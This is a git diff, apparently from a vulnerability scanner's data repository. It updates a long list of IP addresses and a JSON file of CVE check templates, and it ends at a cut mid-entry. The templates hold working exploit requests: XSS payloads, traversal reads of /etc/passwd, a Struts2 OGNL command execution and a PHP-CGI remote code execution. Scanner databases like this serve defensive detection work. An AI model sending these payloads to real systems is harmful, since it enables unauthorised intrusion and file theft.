+74.235.222.29
 74.39.233.253
-74.40.19.68
-74.62.105.162
-74.62.145.76
+74.64.58.42
+74.73.25.246
+74.76.133.55
+74.81.38.26
 74.82.195.39
-74.82.47.194
-74.82.47.51
-74.82.47.56
 74.84.150.6
 74.84.150.70
 74.94.234.151
-74.94.56.139
-75.118.49.220
-75.119.133.23
-75.119.218.236
+75.138.14.2
+75.144.45.17
+75.177.215.42
+75.185.37.38
 75.51.10.234
 75.80.10.175
-75.82.225.11
+75.82.154.211
+75.86.148.172
 75.89.210.84
-76.14.78.133
-76.169.209.172
+76.126.238.37
+76.139.238.61
 76.169.64.240
-76.175.48.16
 76.176.192.135
-76.184.170.108
+76.82.222.37
 76.82.66.174
+76.95.32.130
+77.105.146.42
 77.105.147.237
 77.109.32.245
+77.120.163.173
 77.138.247.245
 77.170.59.124
-77.224.92.128
-77.235.99.148
-77.240.33.35
+77.234.40.122
+77.239.213.0
+77.240.33.59
 77.243.181.54
-77.243.80.83
-77.32.67.106
+77.37.150.155
+77.37.168.42
 77.38.98.163
 77.40.0.17
+77.40.220.2
+77.44.110.101
 77.44.69.250
-77.48.29.2
-77.54.54.54
-77.65.168.51
+77.52.19.44
+77.53.43.24
+77.53.90.144
+77.53.91.135
+77.53.91.200
 77.68.79.72
+77.74.30.86
+77.74.78.44
 77.76.37.51
-77.81.180.97
-77.82.90.234
+77.82.90.210
 77.83.93.138
 77.85.216.134
+77.89.96.128
 77.90.185.10
 77.90.185.121
 77.90.185.122
@@ -9184,526 +9168,509 @@
 77.90.185.18
 77.90.185.19
 77.90.185.71
+77.91.78.115
 77.91.78.129
+77.91.84.54
 77.91.85.147
+77.91.86.95
+77.91.87.79
 78.108.177.50
+78.108.177.54
+78.111.145.180
+78.111.249.76
 78.128.112.205
 78.128.113.250
 78.128.113.34
 78.128.113.94
 78.133.30.102
-78.134.38.138
-78.135.77.132
+78.135.67.221
+78.135.67.50
+78.135.67.6
 78.142.18.92
+78.186.133.164
 78.186.153.90
-78.186.156.212
-78.186.202.172
-78.188.74.250
-78.189.90.106
-78.25.105.127
-78.46.109.172
-78.72.164.51
-78.83.50.156
-78.89.152.189
-78.89.186.203
-79.10.192.56
-79.10.24.181
+78.187.86.131
+78.30.26.84
+78.39.218.210
+78.39.234.59
+78.66.226.53
+78.89.152.190
+78.89.154.22
 79.104.0.82
 79.106.12.211
-79.106.226.235
-79.106.73.114
 79.110.48.172
+79.110.48.218
 79.110.48.83
+79.110.48.90
 79.110.49.193
-79.110.49.194
 79.110.49.208
 79.110.49.220
-79.110.49.221
-79.110.49.241
 79.110.49.242
 79.110.49.245
 79.110.49.98
-79.124.40.78
+79.110.62.245
+79.111.0.58
+79.124.56.202
 79.124.58.130
 79.124.58.166
 79.124.58.78
-79.124.62.106
 79.124.62.130
-79.124.62.202
 79.124.62.62
 79.124.62.78
 79.124.62.82
 79.124.62.86
+79.124.8.3
+79.129.204.181
 79.129.29.237
-79.132.125.226
 79.133.49.111
-79.137.195.103
+79.137.196.145
 79.137.196.210
+79.137.196.237
 79.137.196.40
 79.137.198.143
-79.137.202.87
 79.137.203.226
 79.137.34.148
 79.137.35.194
-79.153.226.233
-79.153.227.117
-79.153.32.142
-79.155.86.112
+79.137.65.46
+79.140.22.146
+79.155.94.205
 79.175.160.120
 79.175.172.61
 79.20.226.105
-79.253.243.200
-79.9.140.145
-8.129.212.192
-8.131.70.17
-8.136.104.235
-8.208.79.119
-8.208.86.182
-8.209.240.18
-8.209.249.229
-8.209.68.21
-8.209.69.246
+79.224.101.37
+79.49.28.239
+79.9.102.168
+8.130.10.146
+8.130.33.78
+8.140.21.58
+8.142.111.3
+8.142.68.87
+8.20.204.147
+8.208.10.94
+8.208.12.226
+8.208.80.202
+8.208.87.112
+8.209.251.108
 8.209.96.179
-8.210.105.62
-8.210.148.17
-8.210.170.98
-8.213.129.130
-8.213.197.220
-8.213.199.252
-8.213.20.64
+8.210.123.17
+8.210.161.5
+8.210.167.33
+8.210.208.44
+8.210.67.251
+8.211.162.45
+8.211.193.107
+8.213.16.250
+8.213.197.49
 8.213.22.165
-8.213.23.197
 8.213.23.69
-8.213.26.128
+8.213.23.89
 8.215.26.47
-8.215.38.34
 8.215.43.101
-8.215.65.177
-8.215.69.58
+8.215.45.250
+8.217.109.235
 8.217.118.75
-8.217.122.113
-8.217.152.154
-8.217.52.177
-8.217.62.164
 8.218.1.5
-8.218.110.83
+8.218.101.123
+8.218.192.91
 8.218.204.87
-8.218.210.78
-8.218.83.159
-8.218.86.0
+8.218.207.231
+8.218.214.1
+8.218.48.143
 8.218.89.123
-8.219.102.174
-8.219.103.16
-8.219.109.178
-8.219.111.115
-8.219.134.77
+8.219.101.174
+8.219.105.103
+8.219.114.145
+8.219.135.27
 8.219.135.30
+8.219.136.127
 8.219.145.96
-8.219.150.253
+8.219.150.234
 8.219.151.146
-8.219.152.230
 8.219.158.222
+8.219.165.232
+8.219.165.240
 8.219.165.78
-8.219.167.236
-8.219.169.63
-8.219.171.80
-8.219.175.130
-8.219.179.133
+8.219.167.92
 8.219.180.124
 8.219.180.250
 8.219.183.34
-8.219.185.96
-8.219.2.198
-8.219.200.84
+8.219.186.121
+8.219.190.132
+8.219.198.1
+8.219.201.169
+8.219.202.109
 8.219.202.220
-8.219.206.180
-8.219.211.18
-8.219.216.142
+8.219.209.131
+8.219.213.210
 8.219.217.119
-8.219.217.233
+8.219.217.47
+8.219.220.148
 8.219.229.12
-8.219.229.170
-8.219.230.107
 8.219.234.194
-8.219.236.199
-8.219.238.163
-8.219.241.123
-8.219.243.102
-8.219.243.203
-8.219.246.42
-8.219.250.11
-8.219.252.10
+8.219.236.45
+8.219.238.192
+8.219.240.191
+8.219.241.113
+8.219.249.116
 8.219.254.48
 8.219.255.247
-8.219.40.77
-8.219.50.197
-8.219.54.186
-8.219.59.71
+8.219.51.31
 8.219.60.174
-8.219.60.77
 8.219.64.126
-8.219.65.51
-8.219.68.62
-8.219.7.201
-8.219.83.85
-8.222.128.163
-8.222.132.198
-8.222.132.240
-8.222.135.239
-8.222.137.241
-8.222.139.60
-8.222.139.80
-8.222.140.207
-8.222.143.227
-8.222.146.130
-8.222.149.148
-8.222.152.252
-8.222.152.5
+8.219.79.23
+8.219.94.104
+8.222.129.101
+8.222.136.15
+8.222.136.21
+8.222.138.169
+8.222.139.141
+8.222.139.75
+8.222.146.233
+8.222.149.158
+8.222.151.6
+8.222.152.152
+8.222.152.157
 8.222.154.232
-8.222.155.135
-8.222.155.49
-8.222.159.155
-8.222.159.210
-8.222.160.61
-8.222.168.157
-8.222.169.164
-8.222.169.20
-8.222.169.239
-8.222.170.238
-8.222.173.71
-8.222.174.150
-8.222.174.229
-8.222.176.53
-8.222.179.111
-8.222.181.195
-8.222.182.186
+8.222.155.100
+8.222.164.74
+8.222.165.45
+8.222.170.209
+8.222.172.253
+8.222.177.99
 8.222.183.199
-8.222.184.247
-8.222.185.0
-8.222.185.246
-8.222.188.229
-8.222.188.244
-8.222.192.14
+8.222.183.203
+8.222.190.119
+8.222.191.74
+8.222.192.141
 8.222.195.5
-8.222.202.243
-8.222.204.75
+8.222.201.35
+8.222.202.173
+8.222.202.25
+8.222.203.60
+8.222.209.0
+8.222.209.103
 8.222.211.110
-8.222.214.116
-8.222.216.90
-8.222.224.164
-8.222.225.227
-8.222.227.87
+8.222.223.100
+8.222.228.172
+8.222.229.84
+8.222.230.242
 8.222.231.12
-8.222.247.229
-8.222.249.144
-8.222.249.19
-8.222.250.117
-8.222.253.12
-80.106.186.239
+8.222.240.38
+8.222.241.66
+8.222.244.108
+8.222.250.254
+8.222.253.11
 80.107.50.128
+80.122.5.206
+80.125.71.115
+80.15.168.167
 80.158.43.11
 80.179.114.175
+80.19.204.177
 80.191.90.136
+80.21.208.94
 80.210.27.29
-80.227.147.94
-80.227.99.162
+80.227.107.250
 80.229.18.62
-80.233.12.110
-80.233.12.97
+80.251.210.73
 80.251.216.10
+80.253.31.232
 80.66.75.139
-80.66.83.165
-80.66.83.77
-80.66.88.204
-80.66.88.211
-80.66.88.41
+80.66.83.132
 80.66.88.53
 80.67.167.81
 80.68.7.179
-80.68.7.50
+80.76.195.26
 80.76.51.104
 80.76.51.235
 80.76.51.241
 80.76.51.34
 80.76.51.48
 80.76.51.74
+80.76.51.89
+80.80.218.227
 80.82.35.52
 80.82.47.187
 80.82.70.228
 80.82.77.139
+80.82.77.144
 80.82.77.33
-80.85.241.14
+80.82.78.14
 80.86.231.91
 80.87.206.53
+80.88.88.149
 80.89.200.109
-80.90.184.133
-80.91.183.93
+80.91.91.122
+80.94.92.30
 80.94.92.31
 80.94.93.210
-80.94.95.242
 80.94.95.249
-80.94.95.68
+81.0.218.195
 81.0.218.244
 81.0.218.249
 81.0.57.187
-81.10.121.196
-81.130.146.115
-81.16.170.117
-81.161.229.250
+81.143.216.63
+81.161.229.46
 81.163.27.186
-81.163.27.59
 81.17.22.114
 81.17.25.50
-81.172.201.241
-81.174.23.66
 81.177.143.135
 81.192.46.38
 81.192.46.45
 81.192.46.48
-81.192.87.130
 81.193.156.156
-81.203.238.20
-81.213.104.251
+81.214.68.195
 81.218.45.149
 81.22.51.64
+81.231.241.25
 81.246.47.178
-81.247.94.31
+81.246.65.159
 81.248.13.77
-81.28.167.30
+81.29.214.123
 81.3.157.110
-81.68.169.243
-81.70.158.78
-81.82.101.142
+81.69.4.61
+81.70.157.20
+81.70.203.89
+81.70.90.183
+81.70.98.61
+81.71.1.242
+81.82.103.78
 81.86.212.0
+81.89.110.244
 82.102.12.37
+82.102.158.36
 82.102.189.184
-82.111.224.128
+82.102.27.163
 82.111.224.129
-82.119.124.138
-82.127.219.71
+82.117.247.185
+82.130.209.229
+82.141.237.225
 82.142.155.158
+82.142.9.207
 82.147.85.78
 82.147.85.79
 82.154.230.131
-82.155.45.55
-82.156.169.242
+82.156.154.151
 82.156.174.174
 82.156.228.240
-82.156.235.34
-82.157.168.198
-82.157.21.149
-82.157.64.24
+82.157.140.231
+82.157.16.11
+82.157.174.41
+82.157.41.6
 82.165.1.72
-82.165.184.76
-82.165.247.235
-82.170.109.90
+82.165.143.209
+82.165.34.181
 82.180.133.236
-82.180.160.238
-82.180.160.68
+82.180.162.185
 82.180.162.30
-82.180.163.3
 82.194.19.180
-82.196.5.221
+82.200.161.178
+82.200.197.100
+82.200.65.218
 82.207.43.150
+82.207.8.154
+82.207.8.170
+82.207.8.198
 82.207.8.202
 82.207.8.206
 82.207.8.242
 82.207.9.150
 82.207.9.226
 82.208.23.205
+82.209.204.169
 82.209.67.238
-82.62.149.230
-82.64.200.188
-82.65.135.40
+82.62.64.131
+82.64.9.81
 82.65.17.52
 82.65.179.65
-82.65.34.213
+82.65.209.209
 82.65.43.136
 82.66.105.4
-82.66.112.26
 82.66.143.175
-82.66.147.134
-82.66.50.241
-82.66.59.170
 82.67.7.178
-82.85.110.146
+82.98.163.34
 83.103.250.246
-83.11.229.186
 83.118.28.129
-83.137.54.101
+83.136.176.12
+83.136.219.103
 83.139.6.147
 83.143.246.30
+83.150.215.253
 83.175.213.253
 83.188.240.119
-83.199.129.165
-83.209.225.143
-83.233.56.71
+83.235.16.111
 83.235.21.125
 83.239.204.140
+83.239.97.132
 83.240.178.154
 83.249.102.252
-83.6.159.163
-83.6.177.194
+83.253.194.35
 83.69.204.2
 83.8.131.51
-83.97.23.181
 83.97.73.87
 84.108.40.27
 84.110.103.166
-84.138.157.232
-84.19.182.20
+84.146.103.99
 84.2.226.70
 84.201.158.231
 84.201.158.33
 84.201.173.228
-84.201.174.187
 84.227.190.79
-84.228.10.170
-84.228.15.36
-84.238.23.220
-84.242.124.74
+84.238.27.103
+84.239.46.144
 84.31.175.97
-84.47.134.205
 84.52.103.234
 84.54.115.46
 84.54.51.12
 84.54.51.121
 84.54.51.142
+84.54.51.188
+84.54.51.2
+84.54.51.212
 84.54.51.252
 84.54.51.254
 84.54.51.27
 84.54.51.4
-84.95.211.198
-85.114.119.22
-85.114.135.225
-85.114.138.220
-85.122.146.46
-85.132.106.146
+84.54.51.92
+84.86.51.250
+84.96.22.14
+85.105.174.16
+85.111.24.98
+85.143.222.168
 85.15.190.226
-85.152.30.138
 85.152.57.60
+85.172.60.21
 85.18.236.229
-85.192.40.211
-85.192.41.225
+85.185.201.10
+85.19.195.12
 85.192.41.240
-85.194.57.132
-85.208.139.127
-85.208.139.205
+85.193.93.225
+85.208.253.115
 85.208.253.130
 85.208.253.133
 85.208.253.160
+85.208.253.165
 85.208.253.191
 85.208.253.195
 85.208.253.204
+85.208.253.207
 85.208.253.209
-85.208.253.249
-85.208.253.83
+85.208.253.242
+85.208.96.193
+85.208.96.195
 85.208.96.196
+85.208.96.197
 85.208.96.198
 85.208.96.199
 85.208.96.200
 85.208.96.201
+85.208.96.202
 85.209.158.9
-85.209.176.30
 85.214.140.22
-85.217.144.114
+85.217.144.141
 85.217.144.82
-85.227.241.184
 85.227.85.186
 85.227.85.29
-85.233.142.6
 85.234.116.19
-85.237.38.194
-85.237.40.115
-85.237.57.193
-85.239.233.198
+85.237.178.248
 85.239.243.172
 85.239.244.200
-85.247.2.222
-85.74.208.123
-85.92.168.28
+85.240.58.125
+85.50.226.36
+85.9.128.217
+85.95.242.203
+85.96.204.192
 85.99.108.68
+86.107.31.40
 86.107.45.46
 86.144.156.87
-86.160.186.215
-86.32.124.11
-86.38.217.96
-86.57.218.140
-86.57.218.177
+86.57.183.121
+86.57.232.71
 86.62.96.179
-87.106.124.127
+86.98.223.118
+87.103.126.54
 87.106.197.31
 87.107.69.6
 87.115.55.86
-87.120.84.105
-87.120.84.111
-87.120.84.122
-87.120.84.124
-87.120.84.126
-87.120.84.186
-87.120.84.96
+87.120.254.48
+87.120.84.146
+87.120.84.182
 87.121.221.164
 87.121.221.176
 87.156.186.65
-87.212.22.254
+87.219.167.20
 87.219.167.80
 87.229.193.98
-87.229.214.186
-87.231.134.254
-87.236.176.160
-87.236.176.165
-87.236.176.204
-87.236.176.226
-87.236.176.31
-87.236.176.91
-87.236.176.96
-87.237.117.183
-87.251.236.115
+87.236.176.116
+87.236.176.135
+87.236.176.150
+87.236.176.171
+87.236.176.175
+87.236.176.217
+87.236.176.231
+87.236.176.237
+87.236.176.33
+87.236.176.39
+87.236.176.47
+87.236.176.48
+87.236.176.54
+87.236.176.55
+87.236.176.59
+87.236.176.62
+87.236.176.81
+87.236.176.85
+87.236.176.95
+87.248.226.146
 87.254.31.23
+87.255.193.50
 87.27.205.141
 87.6.97.214
-87.61.100.143
 87.66.5.199
 87.8.194.222
 87.98.133.33
-88.103.79.196
 88.110.91.74
-88.121.4.73
-88.156.40.50
-88.168.61.98
+88.115.179.177
+88.200.195.115
 88.201.229.78
-88.204.217.246
-88.214.25.16
-88.249.56.14
-88.255.185.253
-88.30.4.209
+88.204.221.66
+88.247.102.53
+88.247.40.182
+88.247.78.116
+88.248.117.149
+88.248.28.108
+88.250.96.112
+88.36.189.42
 88.80.20.49
-88.84.252.159
 88.87.89.202
+88.88.123.168
+89.10.150.58
+89.100.91.14
 89.108.111.51
-89.114.94.207
-89.117.113.246
+89.116.179.49
+89.116.212.151
+89.116.230.119
 89.117.76.39
 89.117.89.212
 89.121.228.38
+89.134.90.97
+89.144.198.144
+89.147.109.226
+89.147.111.157
+89.152.169.98
 89.175.49.2
 89.178.57.150
 89.179.126.155
-89.186.10.225
-89.186.28.250
 89.190.156.177
 89.190.203.54
-89.191.239.118
-89.208.103.140
+89.201.167.100
 89.208.104.119
 89.208.104.244
-89.208.107.234
+89.208.105.228
+89.208.246.109
 89.216.61.223
-89.218.118.22
-89.218.32.2
 89.218.94.98
 89.22.185.202
-89.23.69.252
+89.228.192.51
 89.236.239.25
 89.248.162.161
 89.248.163.130
@@ -9735,51 +9702,68 @@
 89.248.168.42
 89.248.170.132
 89.248.172.16
+89.249.74.213
 89.252.140.21
 89.252.140.220
-89.34.27.143
-89.40.66.22
-89.46.219.237
-89.58.27.84
-89.58.47.87
+89.36.20.218
+89.40.142.102
+89.40.182.150
+89.58.30.164
+89.58.41.251
+89.58.7.177
+89.67.242.130
+89.79.28.117
+89.97.218.142
 90.142.43.162
 90.150.180.78
+90.151.171.109
 90.168.201.25
-90.175.126.120
 90.183.24.74
+90.187.219.149
+90.188.113.141
+90.188.225.36
 90.188.238.219
 90.188.41.224
+90.188.5.39
 90.188.94.2
-90.239.30.219
-90.60.176.166
+91.121.171.183
+91.122.14.24
 91.122.197.235
-91.126.81.159
 91.130.46.174
 91.130.59.242
 91.132.144.59
 91.134.196.199
 91.134.248.249
-91.144.158.231
 91.144.20.198
+91.147.211.250
 91.148.190.174
 91.148.190.230
+91.185.28.60
 91.191.209.198
 91.191.209.222
 91.191.209.26
-91.192.239.239
+91.193.43.11
+91.194.247.22
+91.196.164.131
 91.205.128.170
+91.205.219.185
 91.207.175.154
+91.208.75.153
+91.208.75.156
+91.208.75.239
+91.208.75.3
+91.208.75.4
+91.211.210.99
+91.213.50.8
 91.213.99.15
 91.213.99.45
-91.219.236.137
-91.220.109.185
-91.220.205.69
-91.221.246.6
 91.223.169.83
 91.223.169.88
-91.225.158.77
+91.227.28.137
 91.228.239.246
 91.230.149.142
+91.234.124.6
+91.237.161.246
 91.238.230.148
 91.239.206.219
 91.239.97.29
@@ -9788,45 +9772,45 @@
 91.240.118.71
 91.240.118.75
 91.240.118.77
+91.240.254.106
+91.244.113.156
 91.73.194.178
 91.73.245.102
 91.74.104.250
 91.74.98.114
 91.98.31.173
+92.100.159.115
 92.109.212.217
-92.115.3.157
+92.118.236.114
 92.118.238.15
-92.118.39.108
-92.118.39.109
+92.118.39.242
 92.118.39.248
 92.118.39.35
 92.118.39.40
 92.118.39.81
 92.118.39.84
-92.204.133.133
+92.12.192.221
+92.124.144.204
+92.169.137.228
+92.204.128.76
 92.204.133.169
 92.204.136.167
-92.204.139.216
 92.204.145.83
-92.204.211.200
 92.205.24.196
+92.222.10.177
 92.222.202.39
-92.222.24.76
-92.222.50.21
+92.241.106.38
 92.241.68.2
 92.255.195.59
 92.255.78.148
 92.27.145.24
 92.35.113.200
-92.36.133.72
-92.36.190.80
-92.38.87.173
+92.36.170.130
+92.36.171.252
 92.46.41.208
+92.48.77.62
 92.50.249.166
-92.51.104.150
 92.51.70.138
-92.54.15.116
-92.54.57.90
 92.62.243.133
 92.63.196.33
 92.63.197.110
@@ -9837,43 +9821,44 @@
 92.63.197.92
 92.63.197.93
 92.63.197.97
+92.81.119.26
+92.81.131.98
 92.81.222.217
+92.87.6.104
 93.108.242.140
+93.118.122.51
 93.120.240.202
 93.123.118.185
 93.123.118.225
-93.149.118.114
 93.149.14.173
+93.152.157.174
 93.157.174.208
 93.174.95.106
-93.182.70.227
+93.176.229.145
+93.182.68.88
+93.185.71.21
 93.185.73.178
+93.187.32.42
 93.189.11.246
 93.190.106.139
-93.222.10.11
-93.240.46.99
 93.3.247.235
-93.43.231.181
-93.46.198.114
+93.33.198.173
+93.42.155.2
 93.47.66.126
-93.62.72.229
+93.49.247.215
 93.67.213.111
-93.90.41.12
 93.93.116.89
-93.93.118.142
-94.100.96.34
-94.100.96.60
+93.95.225.141
+94.101.177.146
 94.102.49.190
 94.102.49.193
 94.102.49.205
-94.102.50.103
-94.102.51.15
 94.102.61.10
 94.102.61.2
 94.102.61.20
-94.102.61.21
-94.102.61.22
-94.102.61.26
+94.102.61.23
+94.102.61.24
+94.102.61.25
 94.102.61.27
 94.102.61.28
 94.102.61.29
@@ -9899,102 +9884,117 @@
 94.102.61.53
 94.102.61.54
 94.102.61.6
-94.103.86.109
-94.113.219.91
+94.102.61.70
+94.102.61.75
+94.102.61.80
 94.125.187.102
-94.125.52.254
 94.127.212.198
-94.130.67.88
-94.141.69.156
-94.153.212.78
-94.156.102.151
-94.156.161.43
-94.156.253.122
+94.131.132.139
+94.131.211.168
+94.139.201.162
+94.156.253.107
+94.156.253.110
+94.156.253.245
 94.156.253.31
 94.156.253.41
 94.156.6.105
+94.156.6.24
+94.16.112.22
+94.16.116.81
 94.179.133.22
 94.180.247.20
 94.188.177.110
 94.189.192.230
 94.20.154.204
 94.200.20.66
-94.203.129.98
+94.203.183.34
+94.205.22.95
+94.206.42.182
 94.206.93.90
-94.228.169.133
+94.228.168.29
 94.228.169.70
-94.23.149.231
+94.23.133.43
 94.23.162.147
 94.23.251.90
 94.23.61.165
-94.233.240.141
-94.254.0.234
-94.255.194.104
-94.26.140.101
-94.26.228.161
-94.41.89.42
-94.45.76.149
-94.66.67.57
+94.230.141.234
+94.232.42.99
+94.254.12.27
 94.70.166.88
-94.72.143.239
-94.76.82.57
+94.74.105.244
 95.0.15.234
-95.104.193.17
+95.106.67.231
 95.111.237.28
 95.124.251.22
-95.124.251.25
-95.130.227.116
-95.140.156.17
-95.142.87.114
+95.124.251.24
+95.124.251.29
+95.136.116.62
+95.142.90.214
 95.143.190.164
 95.143.190.182
-95.152.60.122
+95.153.105.131
+95.156.168.230
+95.156.96.46
+95.158.71.6
 95.165.142.8
-95.165.162.140
+95.165.147.31
+95.167.164.230
 95.168.173.143
 95.179.232.134
-95.181.43.122
-95.214.26.111
+95.181.233.19
+95.211.210.103
 95.214.26.136
 95.214.26.143
+95.214.26.184
 95.214.27.118
 95.214.27.126
+95.214.27.145
 95.214.27.159
+95.214.27.230
 95.214.53.134
 95.214.55.244
 95.214.55.43
-95.214.55.85
-95.222.243.108
+95.215.153.66
+95.229.66.163
 95.24.7.18
-95.255.48.157
+95.42.59.166
+95.46.113.106
+95.47.119.95
 95.56.248.141
+95.57.218.103
 95.59.156.124
+95.6.68.209
 95.68.200.146
-95.79.108.51
 95.79.172.183
-95.79.45.205
 95.79.97.88
 95.81.93.135
-96.1.64.194
-96.10.158.110
+95.9.93.130
+95.90.12.128
+96.126.104.125
 96.126.104.221
 96.29.224.230
 96.39.103.194
-96.39.84.233
+96.64.67.41
 96.67.59.65
-96.69.13.140
 96.78.175.36
-96.84.198.29
+96.78.57.140
+96.79.155.194
+96.85.110.193
+96.92.193.161
+97.64.22.63
+97.68.57.241
+97.74.80.181
 97.74.83.185
 97.74.95.243
-98.110.23.77
+97.87.231.7
+97.89.112.49
+98.110.210.74
+98.128.139.100
 98.142.141.184
-98.147.233.57
-98.149.174.1
-98.159.100.153
+98.144.109.171
 98.28.46.53
-98.96.193.3
-98.96.193.4
-98.96.193.5
 99.149.251.77
 99.252.90.240
+99.46.3.41
+99.50.44.7
+99.7.121.109
diff --git a/db/cves.json b/db/cves.json
index 9e6675af..2e9e9b69 100644
--- a/db/cves.json
+++ b/db/cves.json
@@ -1 +1 @@
-{"templates":[{"id":"CVE-2012-1835","info":{"name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4878","info":{"name":"FlatnuX CMS - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4547","info":{"name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4032","info":{"name":"WebsitePanel before v1.2.2.1 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1\nHost: {{Hostname}}\nCookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\n\nctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0896","info":{"name":"Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0392","info":{"name":"Apache Struts2 S2-008 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4768","info":{"name":"WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4889","info":{"name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4242","info":{"name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5913","info":{"name":"WordPress Integrator 1.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</sCripT><sCripT>alert(document.domain)</sCripT>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0991","info":{"name":"OpenEMR 4.1 - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-6499","info":{"name":"WordPress Plugin Age Verification v0.4 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\nHost: {{Hostname}}\n\nredirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-1823","info":{"name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?php echo md5('CVE-2012-1823'); ?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3d638155445bffb044eec401381ad784"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1226","info":{"name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal 